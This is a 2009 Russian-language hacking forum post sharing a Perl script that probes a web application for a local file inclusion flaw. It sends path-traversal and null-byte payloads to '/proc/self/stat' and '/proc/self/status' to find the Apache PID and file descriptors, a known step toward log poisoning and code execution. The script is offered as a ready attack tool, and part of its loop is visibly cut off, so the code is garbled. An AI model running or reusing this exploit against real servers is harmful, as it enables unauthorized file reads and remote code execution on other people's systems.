29.01.2009, 23:20
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами:
10061666
Репутация:
2438
|
|
Скрипт для поиска путей логов Apache
Код:
#! /usr/bin/perl
# perl script to serach apache logs path
# Example:
# URL: http://site/index.php
# Variable: file
# Method: POST
#
# by Pepelux (pepelux[at]enye-sec[dot]org)
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my ($host, $var, $method) = @ARGV ;
unless($ARGV[2]) {
print "Usage: perl $0 \n";
print "\tex: perl $0 http://site.com/index.php file GET\n";
print "\tex: perl $0 http://site.com/index.php file POST\n\n";
exit 1;
}
$ua->agent("");
$ua->timeout(10);
$host = "http://".$host if ($host !~ /^http:/);
if ($method =~ /GET/) {
$url = $host."?".$var."=../../../../proc/self/stat%00";
$req = HTTP::Request->new(GET => $url);
$req->header('Accept' => 'text/html');
}
else {
$req = HTTP::Request->new(POST => $host);
$req->content_type('application/x-www-form-urlencoded');
$req->content($var."=../../../../proc/self/stat%00");
}
$res = $ua->request($req);
if ($res->is_success) {
$result = $res->content;
$result =~ s/]*>//g;
$x = index($result, " ", 0);
$pid = substr($result, 0, $x);
print "Apache PID: ".$pid."\n";
}
if ($method =~ /GET/) {
$url = $host."?".$var."=../../../../proc/self/status%00";
$req = HTTP::Request->new(GET => $url);
$req->header('Accept' => 'text/html');
}
else {
$req = HTTP::Request->new(POST => $host);
$req->content_type('application/x-www-form-urlencoded');
$req->content($var."=../../../../proc/self/status%00");
}
$res = $ua->request($req);
if ($res->is_success) {
$result = $res->content;
$result =~ s/]*>//g;
$x = index($result, "FDSize",0)+8;
$fdsize = substr($result, $x, 3);
print "FD_SIZE: ".$fdsize."\n";
}
for ($cont = 0; $cont ) {
if (($_ =~ /does not exist/) && ($_ =~ /passthru/)) {
print "FD: ".$cont."\n";
exit;
}
}
}
|
|
|